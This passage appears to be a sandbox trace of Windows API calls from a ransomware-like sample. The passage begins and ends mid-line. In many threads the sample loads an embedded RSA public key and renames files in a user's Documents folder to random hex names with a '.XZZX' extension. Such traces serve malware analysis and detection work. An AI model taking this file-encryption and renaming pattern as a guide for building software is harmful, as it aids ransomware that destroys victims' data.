lpWideCharStr="XZZX") returned 5 [0172.542] wsprintfW (in: param_1=0x29ae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\809699720A4E61D2E3F44B730CE9461A.XZZX") returned 81 [0172.542] StrStrW (lpFirst="38AA9E1F3FE71932FADE96E143FEFD7A.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 597 os_tid = 0x4e8 [0172.699] lstrcpyA (in: lpString1=0x29afc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0172.699] lstrcpyW (in: lpString1=0x29af460, lpString2="4CA2A3B835A9C9D86061764339F6AE20.XZZX" | out: lpString1="4CA2A3B835A9C9D86061764339F6AE20.XZZX") returned="4CA2A3B835A9C9D86061764339F6AE20.XZZX" [0172.699] lstrcpyW (in: lpString1=0x29ae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0172.699] SetErrorMode (uMode=0x1) returned 0x1 [0172.699] lstrcpyW (in: lpString1=0x29af860, lpString2="4CA2A3B835A9C9D86061764339F6AE20.XZZX" | out: lpString1="4CA2A3B835A9C9D86061764339F6AE20.XZZX") returned="4CA2A3B835A9C9D86061764339F6AE20.XZZX" [0172.699] CoCreateGuid (in: pguid=0x29ae440 | out: pguid=0x29ae440*(Data1=0x99bdb14e, Data2=0x9887, Data3=0x424c, Data4=([0]=0x88, [1]=0xc4, [2]=0xa6, [3]=0xcf, [4]=0x94, [5]=0x19, [6]=0x78, [7]=0x8b))) returned 0x0 [0172.699] wsprintfW (in: param_1=0x29aec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4CA2A3B835A9C9D86061764339F6AE20.XZZX") returned 81 [0172.699] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x29afee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0172.699] wsprintfW (in: param_1=0x29ae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\B44ED0222780161499BDB14E2A1AFA5C.XZZX") returned 81 [0172.699] StrStrW (lpFirst="4CA2A3B835A9C9D86061764339F6AE20.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 598 os_tid = 0x22c [0172.855] lstrcpyA (in: lpString1=0x29afc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0172.855] lstrcpyW (in: lpString1=0x29af460, lpString2="5A5E8816436ABA61C7EC8F1A47A79EA9.XZZX" | out: lpString1="5A5E8816436ABA61C7EC8F1A47A79EA9.XZZX") returned="5A5E8816436ABA61C7EC8F1A47A79EA9.XZZX" [0172.855] lstrcpyW (in: lpString1=0x29ae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0172.855] SetErrorMode (uMode=0x1) returned 0x1 [0172.855] lstrcpyW (in: lpString1=0x29af860, lpString2="5A5E8816436ABA61C7EC8F1A47A79EA9.XZZX" | out: lpString1="5A5E8816436ABA61C7EC8F1A47A79EA9.XZZX") returned="5A5E8816436ABA61C7EC8F1A47A79EA9.XZZX" [0172.855] CoCreateGuid (in: pguid=0x29ae440 | out: pguid=0x29ae440*(Data1=0x6bea4e51, Data2=0xd5b5, Data3=0x4b30, Data4=([0]=0xab, [1]=0x29, [2]=0x55, [3]=0x37, [4]=0x1, [5]=0x53, [6]=0x71, [7]=0x26))) returned 0x0 [0172.855] wsprintfW (in: param_1=0x29aec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5A5E8816436ABA61C7EC8F1A47A79EA9.XZZX") returned 81 [0172.855] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x29afee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0172.855] wsprintfW (in: param_1=0x29ae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3FD2C4453EC418F06BEA4E51415EFD38.XZZX") returned 81 [0172.855] StrStrW (lpFirst="5A5E8816436ABA61C7EC8F1A47A79EA9.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 599 os_tid = 0x6ec [0173.010] lstrcpyA (in: lpString1=0x29afc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0173.010] lstrcpyW (in: lpString1=0x29af460, lpString2="5F3F59042CD153CCC290441930FE3814.XZZX" | out: lpString1="5F3F59042CD153CCC290441930FE3814.XZZX") returned="5F3F59042CD153CCC290441930FE3814.XZZX" [0173.010] lstrcpyW (in: lpString1=0x29ae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0173.010] SetErrorMode (uMode=0x1) returned 0x1 [0173.010] lstrcpyW (in: lpString1=0x29af860, lpString2="5F3F59042CD153CCC290441930FE3814.XZZX" | out: lpString1="5F3F59042CD153CCC290441930FE3814.XZZX") returned="5F3F59042CD153CCC290441930FE3814.XZZX" [0173.010] CoCreateGuid (in: pguid=0x29ae440 | out: pguid=0x29ae440*(Data1=0xcbf49e1b, Data2=0x48db, Data3=0x4bab, Data4=([0]=0x84, [1]=0x8e, [2]=0xbe, [3]=0xcd, [4]=0x18, [5]=0xe9, [6]=0xa2, [7]=0x70))) returned 0x0 [0173.010] wsprintfW (in: param_1=0x29aec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5F3F59042CD153CCC290441930FE3814.XZZX") returned 81 [0173.010] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x29afee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0173.011] wsprintfW (in: param_1=0x29ae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\46BAD9191588D349CBF49E1B1823B791.XZZX") returned 81 [0173.011] StrStrW (lpFirst="5F3F59042CD153CCC290441930FE3814.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 600 os_tid = 0x254 [0173.166] lstrcpyA (in: lpString1=0x29afc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0173.166] lstrcpyW (in: lpString1=0x29af460, lpString2="7E0556C23257A27A640F901F368486C2.XZZX" | out: lpString1="7E0556C23257A27A640F901F368486C2.XZZX") returned="7E0556C23257A27A640F901F368486C2.XZZX" [0173.166] lstrcpyW (in: lpString1=0x29ae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0173.166] SetErrorMode (uMode=0x1) returned 0x1 [0173.166] lstrcpyW (in: lpString1=0x29af860, lpString2="7E0556C23257A27A640F901F368486C2.XZZX" | out: lpString1="7E0556C23257A27A640F901F368486C2.XZZX") returned="7E0556C23257A27A640F901F368486C2.XZZX" [0173.166] CoCreateGuid (in: pguid=0x29ae440 | out: pguid=0x29ae440*(Data1=0x90ff1ee3, Data2=0x264b, Data3=0x4a54, Data4=([0]=0x84, [1]=0x3e, [2]=0xc1, [3]=0x8b, [4]=0xc9, [5]=0x9e, [6]=0x64, [7]=0x43))) returned 0x0 [0173.166] wsprintfW (in: param_1=0x29aec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\7E0556C23257A27A640F901F368486C2.XZZX") returned 81 [0173.166] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x29afee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0173.166] wsprintfW (in: param_1=0x29ae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5953BE810B1E3E9C90FF1EE30DB922E4.XZZX") returned 81 [0173.167] StrStrW (lpFirst="7E0556C23257A27A640F901F368486C2.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 601 os_tid = 0x228 [0173.322] lstrcpyA (in: lpString1=0x29afc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0173.322] lstrcpyW (in: lpString1=0x29af460, lpString2="96E8BC382A82756A96F374BC2E7B59B2.XZZX" | out: lpString1="96E8BC382A82756A96F374BC2E7B59B2.XZZX") returned="96E8BC382A82756A96F374BC2E7B59B2.XZZX" [0173.322] lstrcpyW (in: lpString1=0x29ae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0173.322] SetErrorMode (uMode=0x1) returned 0x1 [0173.322] lstrcpyW (in: lpString1=0x29af860, lpString2="96E8BC382A82756A96F374BC2E7B59B2.XZZX" | out: lpString1="96E8BC382A82756A96F374BC2E7B59B2.XZZX") returned="96E8BC382A82756A96F374BC2E7B59B2.XZZX" [0173.322] CoCreateGuid (in: pguid=0x29ae440 | out: pguid=0x29ae440*(Data1=0x973afddf, Data2=0x8af6, Data3=0x4e3b, Data4=([0]=0xaf, [1]=0x16, [2]=0xc2, [3]=0xd4, [4]=0xad, [5]=0x3f, [6]=0x9e, [7]=0x90))) returned 0x0 [0173.323] wsprintfW (in: param_1=0x29aec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\96E8BC382A82756A96F374BC2E7B59B2.XZZX") returned 81 [0173.323] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x29afee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0173.323] wsprintfW (in: param_1=0x29ae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1F8A2A4A2A76FAB2973AFDDF2D11DEFA.XZZX") returned 81 [0173.323] StrStrW (lpFirst="96E8BC382A82756A96F374BC2E7B59B2.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 602 os_tid = 0x618 [0173.478] lstrcpyA (in: lpString1=0x29afc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0173.478] lstrcpyW (in: lpString1=0x29af460, lpString2="A9467A821967F20598E66B961D60D64D.XZZX" | out: lpString1="A9467A821967F20598E66B961D60D64D.XZZX") returned="A9467A821967F20598E66B961D60D64D.XZZX" [0173.478] lstrcpyW (in: lpString1=0x29ae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0173.478] SetErrorMode (uMode=0x1) returned 0x1 [0173.478] lstrcpyW (in: lpString1=0x29af860, lpString2="A9467A821967F20598E66B961D60D64D.XZZX" | out: lpString1="A9467A821967F20598E66B961D60D64D.XZZX") returned="A9467A821967F20598E66B961D60D64D.XZZX" [0173.479] CoCreateGuid (in: pguid=0x29ae440 | out: pguid=0x29ae440*(Data1=0x5905fa29, Data2=0xfd79, Data3=0x453b, Data4=([0]=0xb6, [1]=0x71, [2]=0x70, [3]=0x9e, [4]=0x1f, [5]=0x6c, [6]=0x70, [7]=0x1e))) returned 0x0 [0173.479] wsprintfW (in: param_1=0x29aec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\A9467A821967F20598E66B961D60D64D.XZZX") returned 81 [0173.479] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x29afee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0173.479] wsprintfW (in: param_1=0x29ae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FC0DC261448C07E35905FA294726EC2B.XZZX") returned 81 [0173.479] StrStrW (lpFirst="A9467A821967F20598E66B961D60D64D.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 603 os_tid = 0x4f0 [0173.634] lstrcpyA (in: lpString1=0x29afc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0173.634] lstrcpyW (in: lpString1=0x29af460, lpString2="AF137D37318F929FC9EC733B358876E7.XZZX" | out: lpString1="AF137D37318F929FC9EC733B358876E7.XZZX") returned="AF137D37318F929FC9EC733B358876E7.XZZX" [0173.634] lstrcpyW (in: lpString1=0x29ae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0173.634] SetErrorMode (uMode=0x1) returned 0x1 [0173.634] lstrcpyW (in: lpString1=0x29af860, lpString2="AF137D37318F929FC9EC733B358876E7.XZZX" | out: lpString1="AF137D37318F929FC9EC733B358876E7.XZZX") returned="AF137D37318F929FC9EC733B358876E7.XZZX" [0173.634] CoCreateGuid (in: pguid=0x29ae440 | out: pguid=0x29ae440*(Data1=0x87e6b26b, Data2=0x329a, Data3=0x492e, Data4=([0]=0x81, [1]=0x61, [2]=0x56, [3]=0x50, [4]=0x4e, [5]=0x5, [6]=0x66, [7]=0x91))) returned 0x0 [0173.634] wsprintfW (in: param_1=0x29aec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\AF137D37318F929FC9EC733B358876E7.XZZX") returned 81 [0173.634] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x29afee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0173.635] wsprintfW (in: param_1=0x29ae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CFA03A5E0E7701AC87E6B26B1111E5F4.XZZX") returned 81 [0173.635] StrStrW (lpFirst="AF137D37318F929FC9EC733B358876E7.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 604 os_tid = 0x758 [0173.790] lstrcpyA (in: lpString1=0x29afc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0173.790] lstrcpyW (in: lpString1=0x29af460, lpString2="B0407B59334CDCAF9E2CA2E33779C0F7.XZZX" | out: lpString1="B0407B59334CDCAF9E2CA2E33779C0F7.XZZX") returned="B0407B59334CDCAF9E2CA2E33779C0F7.XZZX" [0173.790] lstrcpyW (in: lpString1=0x29ae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0173.790] SetErrorMode (uMode=0x1) returned 0x1 [0173.791] lstrcpyW (in: lpString1=0x29af860, lpString2="B0407B59334CDCAF9E2CA2E33779C0F7.XZZX" | out: lpString1="B0407B59334CDCAF9E2CA2E33779C0F7.XZZX") returned="B0407B59334CDCAF9E2CA2E33779C0F7.XZZX" [0173.791] CoCreateGuid (in: pguid=0x29ae440 | out: pguid=0x29ae440*(Data1=0x735bf1d7, Data2=0x9ce3, Data3=0x4f87, Data4=([0]=0x9c, [1]=0x9d, [2]=0x81, [3]=0x50, [4]=0x8a, [5]=0xa9, [6]=0xf3, [7]=0xbe))) returned 0x0 [0173.791] wsprintfW (in: param_1=0x29aec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\B0407B59334CDCAF9E2CA2E33779C0F7.XZZX") returned 81 [0173.791] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x29afee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0173.791] wsprintfW (in: param_1=0x29ae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\51E675A530BCC8B5735BF1D73357ACFD.XZZX") returned 81 [0173.791] StrStrW (lpFirst="B0407B59334CDCAF9E2CA2E33779C0F7.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 605 os_tid = 0x314 [0173.947] lstrcpyA (in: lpString1=0x29afc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC 